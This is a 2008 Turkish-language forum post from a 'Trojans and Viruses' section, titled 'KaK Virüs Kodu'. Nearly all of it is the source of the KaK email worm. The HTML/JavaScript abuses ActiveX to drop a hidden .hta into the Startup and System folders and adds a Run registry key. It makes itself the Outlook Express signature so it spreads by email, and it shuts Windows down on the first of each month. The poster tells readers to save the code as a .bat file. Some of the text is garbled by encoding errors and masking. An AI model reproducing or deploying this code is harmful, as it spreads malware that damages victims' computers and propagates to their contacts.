HOŞGELDİNİZ

--------------------------
 
AnasayfaAnasayfa  SSSSSS  AramaArama  Kayıt OlKayıt Ol  Giriş yap  

Paylaş | 
 

 ::KaK Virüs Kodu ::

Aşağa gitmek 
YazarMesaj
4drk

avatar

Mesaj Sayısı : 20
Kayıt tarihi : 07/07/08
Yaş : 26
Nerden : SanaNe NapcaN xD

MesajKonu: ::KaK Virüs Kodu ::   Ptsi Tem. 07, 2008 8:17 pm

::::KaK Virüs Kodu::::::


<DIV style=3D"POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
<OBJECT classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC=20
id=3Dscr></OBJECT></DIV><******><!--
function sErr(){return
true;}window.onerror=sErr;scr.Reset();scr.doc="Z<H TML><HEAD><TITLE>Driver
Memory Error</"+"TITLE><HTA:APPLICATION ID=\"hO\"
WINDOWSTATE=Minimize></"+"HEAD><BODY BGCOLOR=#CCCCCC><object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><******>function
sEr(){self.close();return true;}window.onerror=sEr;fs=new
ActiveXObject('******ing.FileSystemObject';wd='C:\ \\\Windows\\\\';fl=fs.GetFolde
r(wd+'Applic~1\\\\Identities';sbf=fl.SubFolders;fo r(var
mye=new Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=my e.item();ids=new
String(idd);idn=ids.slice(31);fic=idn.substring(1, 9);kfr=wd+'MENUDÉ~1\\\\PROGRA~1
\\\\DÉMARR~1\\\\kak.hta';ken=wd+'STARTM~1\\\\Progr ams\\\\StartUp\\\\kak.hta';k2=w
d+'System\\\\'+fic+'.hta';kk=(fs.FileExists(kfr))? kfr:ken;aek='C:\\\\AE.KAK';aeb=
'C:\\\\Autoexec.bat';if(!fs.FileExists(aek)){re=/kak.hta/i;if(hO.commandLine.sear
ch(re)!=-1){f1=fs.GetFile(aeb);f1.Copy(aek);t1=f1.OpenAsTex tStream(;pth=(kk==kf
r)?wd+'MENUD�~1\\\\PROGRA~1\\\\D�MARR~1\\\\kak.hta ':ken;t1.WriteLine('@echo
off>'+pth);t1.WriteLine('del
'+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.Copy File(kk,k2);fs.GetFile(k2).Attr
ibutes=2;}t2=fs.CreateTextFile(wd+'kak.reg';t2.wri te('REGEDIT4';t2.WriteBlankLi
nes(2);ky='[HKEY
CURRENT USER\\\\Identities\\\\'+idn+'\\\\Software\\\\Micro soft\\\\Outlook
Express\\\\5.0';sg='\\\\signatures';t2.WriteLine(k y+sg+']';t2.Write('\"Default
Signature\"=\"00000000\"';t2.WriteBlankLines(2);t2 .WriteLine(ky+sg+'\\\\00000000
]';t2.WriteLine('\"name\"=\"Signature
#1\"';t2.WriteLine('\"type\"=dword:00000002';t2.Wr iteLine('\"text\"=\"\"';t2.W
rite('\"file\"=\"C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\ "';t2.WriteBlankLines(2);t2.Wr
iteLine(ky+']';t2.Write('\"Signature
Flags\"=dword:00000003';t2.WriteBlankLines(2);t2.W riteLine('[HKEY LOCAL
MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Cur rentVersion\\\\Run]';t2.Write(
'\"cAg0u\"=\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\ \\'+fic+'.hta\"';t2.WriteBlank
Lines(2);t2.close();wsh.Run(wd+'Regedit.exe
-s
'+wd+'kak.reg';t3=fs.CreateTextFile(wd+'kak.htm',1);t3.Write('<H TML><BODY><DIV
style=\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT
classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC
id=scr></"+"OBJECT></"+"DIV>';t4=fs.OpenTextFile(k2,1);while(t4.Read(1) !='Z';t3.Writ
eLine('<******><!--';t3.write('function
sErr(){return
true;}window.onerror=sErr;scr.Reset();scr.doc=\"Z' ;rs=t4.Read(3095);t4.close();r
d=/\\\\/g;re=/\"/g;rf=/<\\//g;rt=rs.replace(rd,'\\\\\\\\'.replace(re,'\\\\\"'.re
place(rf,'</"+"\"+\"';t3.WriteLine(rt+'\";la=(navigator.system Language)?navigator
.systemLanguage:navigator.language;scr.Path=(la==\ "fr\"?\"C:\\\\\\\\windows\\\\\
\\\Menu
Démarrer\\\\\\\\Programmes\\\\\\\\Démarrage\\\\\\\ \kak.hta\":\"C:\\\\\\\\windows\
\\\\\\\Start
Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\kak.hta \";agt=navigator.userAgent.toLo
werCase();if(((agt.indexOf(\"msie\"!=-1)&&(parseInt(navigator.appVersion)>4))||(a
gt.indexOf(\"msie
5.\"!=-1))scr.write();';t3.write('//
--></"+"'+'******></"+"'+'OBJECT></"+"'+'BODY></"+"'+'HTML>';t3.close();fs.GetFile(wd+'ka
k.htm'.Attributes=2;fs.DeleteFile(wd+'kak.reg';d=new
Date();if(d.getDate()==1 && d.getHours()>17){alert('Kagou-Anti-Kroşoft
says not today !';wsh.Run(wd+'RUNDLL32.EXE
user.exe,exitwindows';}self.close();</"+"******>S3 driver memory alloc
failed
!]]%%%%%</"+"BODY></"+"HTML";la=(navigator.systemLanguage)?navigator.s ystemLanguage:
navigator.language;scr.Path=(la=="fr"?"C:\\windows\\Menu
Démarrer\\Programmes\\Démarrage\\kak.hta":"C:\\win dows\\Start
Menu\\Programs\\StartUp\\kak.hta";agt=navigator.us erAgent.toLowerCase();if(((agt.
indexOf("msie"!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.inde xOf("msie
5."!=-1))scr.write();
// --></******>
</OBJECT></DIV></BODY></HTML>



BunLarı NotePat'te AcıN YapısTırN UzaNtısnı Farklı KaydetteN ısmının Sonuna .bat OLaraK YapısTırıN...
KoLaY GeLsiN Twisted Evil
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
 
::KaK Virüs Kodu ::
Sayfa başına dön 
1 sayfadaki 1 sayfası

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
HOŞGELDİNİZ :: GÜVENLİK BÖLÜMÜ :: Trojan ve Virüsler-
Buraya geçin: